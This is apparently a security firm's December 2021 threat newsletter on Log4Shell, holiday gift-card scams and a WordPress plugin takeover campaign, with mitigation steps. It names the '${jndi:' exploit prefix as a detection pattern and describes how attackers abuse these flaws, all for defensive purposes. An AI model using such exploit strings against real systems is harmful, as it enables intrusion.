A Month In Breaches: December

A month in Breaches December issue, Breaches, breach data, massive attacks in cyberspace

Part of protecting our clients is also promoting good security practices and raising awareness of current security trends. We hope this will bolster your overall understanding of cybersecurity attacks across the globe. This is an initiative by our Security Operations Centre team who have their eyes on the prize 24/7 and are proactively observing breaches and critical security trends. We observed the rising trends in cyber attacks and system compromise in the last month of 2021.  Please see below for mitigation strategies recommended by CTRL Group.

Log4Shell Vulnerability 

Log4Shell is a software vulnerability in Apache Log4j, a highly used open-source logging framework that allows software developers to log data within their applications. Since December 10, when it was published, it is estimated that hundreds of millions of devices were affected. The vulnerability is officially titled CVE-2021-44228 and received the highest Common Vulnerability Scoring System (CVSS) score – 10/10, with experts describing it as “arguably the most severe vulnerability ever”. 

The vulnerability allows an attacker to remotely take control of internet-connected devices that are running any version of the Log4j library prior to 2.17, which was released on December 17 after two previous versions released after the vulnerability’s exposure either only partially fixed it or had contained new vulnerabilities. This library is incredibly popular; experts assume that nearly half of all corporate networks worldwide have been actively probed and that the vulnerability affected 93% of enterprise cloud environments.  

The vulnerability is considered easy to exploit, which makes it even more dangerous. It is currently still being exploited against countless organisations that have yet to patch every vulnerable asset, mainly due to the ease with which malicious attackers can exploit it. Nefarious activities conducted by hackers against victims by utilising this vulnerability include ransomware attacks, cryptocurrency mining, botnets creation, sending spam, establishing backdoors and other illegal activities. Microsoft stated it has seen evidence of the vulnerability being used by multiple nation-state threat actors originating from China, Iran, North Korea and Turkey. 

Can you prevent this attack?  

Yes, you can mitigate this risk, using the following recommendations:  

  1. If you haven’t already, make sure all of your vulnerable assets are patched to Log4j version 2.17, including any internally developed software that use the log4j library. 
  2. If, for any reason, patching is not possible, you should apply the following steps: 
    • In releases 2.10 and higher, sett either the system property “log4j2.formatMsgNoLookups” or the environment variable “LOG4J_FORMAT_MSG_NO_LOOKUPS” to true.   
    • For releases from 2.0-beta9 to 2.10.0, remove the “JndiLookup” class from the classpath: “zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class”.  
  3. Use the Huntress Labs Log4Shell vulnerability tester to determine whether your applications are vulnerable to this threat. 
  4. Remember that patching only mitigates attacks from that point on, while attackers may have breached your network prior to it. CTRL Group advises the following steps: 
    • Scan your environmawsnstent for vulnerable machines. 
    • Be on the lookout for any unauthorised configuration changes. 
    • Search for odd or abnormal traffic patterns that might imply an attacker is inside your network – specifically variations of the phrase “${jndi:”, which precedes the attackers’ internet address. If this phrase was found on your network, CTRL Group advises initiating a full scan of the compromised network.

 

‘Tis the Season to… Be Wary of Scams

The holidays season is a great time to unwind, spending some much-needed relaxation time with your loved ones. That is, if you’re not a hacker trying to scam people out of their hard-earned money. 

Christmas time is one of the busiest times of the year not only for retail and logistics businesses but also for hackers who exploit the huge influx of shopping being done to siphon off credit card details, bank credentials or personal information via gift cards and other shopping-related scams. The volume of online shopping this year is expected to be the largest ever – global online spending during the holiday season is expected to increase by 11% to $910 billion. With store closures and increases in online shopping, along with limited product availability and concerns about shipping, cybercriminals put in the effort to claim a piece of the pie. 

The US Federal Trade Commission (FTC) said Americans reported losing $148 million to gift card scams during the first nine months of 2021, a significant increase compared to 2020. Of which, $35m was lost to frauds using Target gift cards, $17m lost to Google Play gift cards relates scams, followed by Apple ($16m), eBay ($10m) and Walmart ($6m). In Australia, clients have already lost about $12.9 million to online shopping scams so far this year. 

Security companies observed gift card balance lookups quadruple, which indicates that scammers are using bots to identify and steal gift card balances. Stolen gift cards typically get spent very fast, so many people may end up getting zero-balance gift cards as presents. 

“Bad bots” continue to be a major threat to online retail businesses. The level of sophistication that is witnessed is at an all-time, as cyber criminals increase their collaboration and improve their ways of conducting fraud and generating profits through the use of automation. 

Recommended Mitigation Actions 

How can you help protect yourself from these holidays season scams and subsequent attacks? 

  1. Do not click a link or open a file that promises gift cards or sales that come from an unknown origin. Use official websites to find real deals. 
  2. Do not provide your details (passwords, bank details etc.) to anyone in exchange for a gift card. 
  3. If you receive an offer that sounds too good to be true, it usually is. Explore further online to check whether or not it is a scam 
  4. Always prefer to use secure payment options that come with protection, such as PayPal or a credit card. If a seller asks you to pay via gift cards only, do not deal with them. 
  5. Do not use your credit card details in suspicious websites. If you don’t see the lock icon and the ‘https’ address, or if you see any other suspicious signs, it is better to be safe than sorry. 
  6. If you received a gift card you did not expect, be suspicious; try and authenticate its validity by browsing the official website of its store/service (by searching it rather than clicking a link) and typing its details. 
  7. Advertisements on social media websites also often lead to fake offers, bogus websites and other scams. Think before you click. 
  8. When you are accessing or sharing confidential information (credit card, bank login details, etc.), do not use a public Wi-Fi network. 

 

Massive Attack Against 1.6 million WordPress Sites Underway 

Cyber security experts have recently detected a massive jump in the number of attacks launched against WordPress websites, scaling up to 1.6 million different victims, with the attacks originating from 16,000 different IPs. 

Based on the findings, the threat actors behind these attacks have mostly targeted four specific plugins, in which a similar vulnerability can be exploited. Several of the plugins had this vulnerability fixed, some years ago and some as recently as last week, while some still have no available patch as of today. 

In most attacks observed, the threat actors update the targeted websites’ settings so the default role would be the administrator. This makes it possible for them to have full control of any website, effectively taking over it. 

To protect yourself from these vulnerabilities, ensure that your website is running a version higher than any of the ones listed for the specific plugins. These are the affected plugins and the versions they must be updated to in order to mitigate this attack campaign: 

 

Recommended Mitigation Actions 

To check if your website has been compromised, CTRL Group recommends reviewing all user accounts for any changes, and also looking for any additions or plugins you did not add and removing them. 

Other more general WordPress security tips are: 

  1. Change the security settings on your WordPress website so it limits access to internal libraries to authorised parties only, and also make sure it does not index your internal libraries on search engines such as Google. CTRL Group has observed many website admins that forget to do this, which leaves their private information easily accessible to anyone via a simple online search. 
  2. Review your website’s settings and change the new user default role to the lowest permission possible. 
  3. Try and keep the number of plugins on your WordPress website to a minimum, as this greatly reduces the chances of being hacked. 
  4. Update your plugins and themes regularly; if you use one that contains vulnerabilities and has no available patch, uninstall it. 
  5. Remember that updating plugins and themes only mitigate attacks from that point on, while attackers may have already breached your website. If you suspect you have been breached, contact a cyber security company to assess your situation. 

 

– CTRL GROUP SECURITY OPERATIONS CENTRE Cyber Threat Intelligence Analyst, Yonatan